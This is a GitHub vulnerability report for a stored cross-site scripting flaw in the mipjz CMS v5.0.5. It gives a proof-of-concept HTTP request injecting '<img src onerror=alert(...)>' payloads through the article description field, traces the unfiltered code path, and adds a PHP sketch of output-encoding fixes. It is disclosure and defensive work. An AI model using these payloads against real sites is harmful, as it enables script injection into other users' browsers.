A cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 #15

Open
sma11new opened this issue May 17, 2023 · 1 comment

@sma11new

[Vulnerability Description]
A Cross Site Scripting (XSS) vulnerability exists in mipjz v5.0.5; attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

  1. Add an article, insert js code in the description parameter: xss
```http
POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId: 
Content-Length: 426
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss&lt;img src onerror=alert(1)&gt;","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}
```

  2. Visit the article page, the code is loaded and executed

[Code Details]

  1. Add an article, receive parameters, and pass it to \app\article\model\Articles.php:itemAdd for processing

  2. \app\article\model\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

  3. Article Details \app\article\controller\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

  4. In the "guess you like" area in the article display \template\default\article\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed

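Added example, not part of the original report and not mipjz code: a PHP sketch of the two controls the code path described above lacks, namely cleanup of the plain-text description before storage and HTML encoding when it is written into the page. The function names, the `desc` markup and the sample row are hypothetical; the description value is the one from the request in the report.

```php
<?php
// Added illustration, not mipjz source. All function names are hypothetical.

/** Encode untrusted text for an HTML element body or a quoted attribute value. */
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Normalise a plain-text field (e.g. an article description) before storage. */
function cleanPlainText(string $value, int $maxLen = 255): string
{
    $value = strip_tags($value);                                   // field is not meant to carry markup
    $value = preg_replace('/[\x00-\x1F\x7F]/u', '', $value) ?? ''; // drop control chars; '' on invalid UTF-8
    return mb_substr(trim($value), 0, $maxLen, 'UTF-8');           // requires the mbstring extension
}

/** Render a related-articles list from database rows, encoding every field on output. */
function renderRelated(array $rows): string
{
    $html = "<ul>\n";
    foreach ($rows as $row) {
        $html .= '  <li><span class="title">' . escapeHtml((string) $row['title']) . '</span>'
               . '<p class="desc">' . escapeHtml((string) $row['description']) . "</p></li>\n";
    }
    return $html . "</ul>\n";
}

// Constructed sample row: title and description as submitted in the report's request.
$row = ['title' => 'xss', 'description' => 'xss<img src onerror=alert(22)>'];

// Before: the stored value is concatenated into markup unchanged,
// so the browser parses the <img> element and runs its handler.
$unsafe = '<p class="desc">' . $row['description'] . '</p>';

// After: the same stored value, encoded at the point of output.
$safe = renderRelated([$row]);

// Defence in depth at write time; output encoding above remains the primary fix,
// because rows already stored in the database are not cleaned retroactively.
$stored = cleanPlainText($row['description']);

echo $unsafe, PHP_EOL, $safe, $stored, PHP_EOL;
```

The same encoding applies to the other user-controlled fields in that request (`title`, `tags`, the `fieldList` names) wherever they are written into HTML.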

@attritionorg

What level of authentication does this require?
